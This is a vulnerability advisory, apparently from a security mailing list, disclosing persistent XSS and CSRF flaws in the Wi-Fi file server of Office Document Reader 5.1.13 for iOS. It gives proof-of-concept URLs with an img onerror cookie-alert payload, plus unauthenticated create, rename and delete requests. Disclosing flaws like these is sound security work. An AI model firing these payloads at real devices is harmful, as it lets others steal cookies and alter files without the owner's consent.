Office Document Reader 5.1.13 XSS / CSRF

`Hello list!  
  
Happy New Year!  
  
There are multiple vulnerabilities in Office Document Reader for iOS. There   
are Cross-Site Scripting and Cross-Site Request Forgery vulnerabilities.   
Earlier I've informed developer of Office Document Reader about this and   
other his software.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are Office Document Reader 5.1.13 for iOS and previous versions.   
Vulnerable as paid, as free version (at the beginning the paid function   
works of access via Wi-Fi, which turns on http and ftp server).  
  
-------------------------  
Affected vendor:  
-------------------------  
  
LTD DevelSoftware.  
  
----------  
Details:  
----------  
  
Cross-Site Scripting (WASC-08) (Persistent XSS):  
  
http://192.168.0.28/createdir?path=%3Cimg%20src=%271%27%20onerror=%27alert(document.cookie)%27%3E  
  
http://192.168.0.28/rename?path=%2FFolder&newpath=%271%27%20onerror=%27alert(document.cookie)%27%3E  
  
Cross-Site Scripting (WASC-08) (Persistent XSS):  
  
Through FTP it's possible to set name of folder or file with XSS code. The   
access to http and ftp servers via local networks is not limited (without   
password). Therefore via uploading it's possible in particular to conduct   
XSS attack.  
  
Cross-Site Request Forgery (WASC-09):  
  
The whole functionality is vulnerable to CSRF attacks: creation, renaming   
and deleting of a folder.  
  
http://192.168.0.28/createdir?path=%2FFolder  
  
http://192.168.0.28/rename?path=%2FFolder&newpath=%2FFolder2  
  
http://192.168.0.28/delete?path=%2FFolder  
  
I mentioned about these vulnerabilities at my site   
(http://websecurity.com.ua/8092/).  
  
Best wishes & regards,  
Eugene Dokukin aka MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
`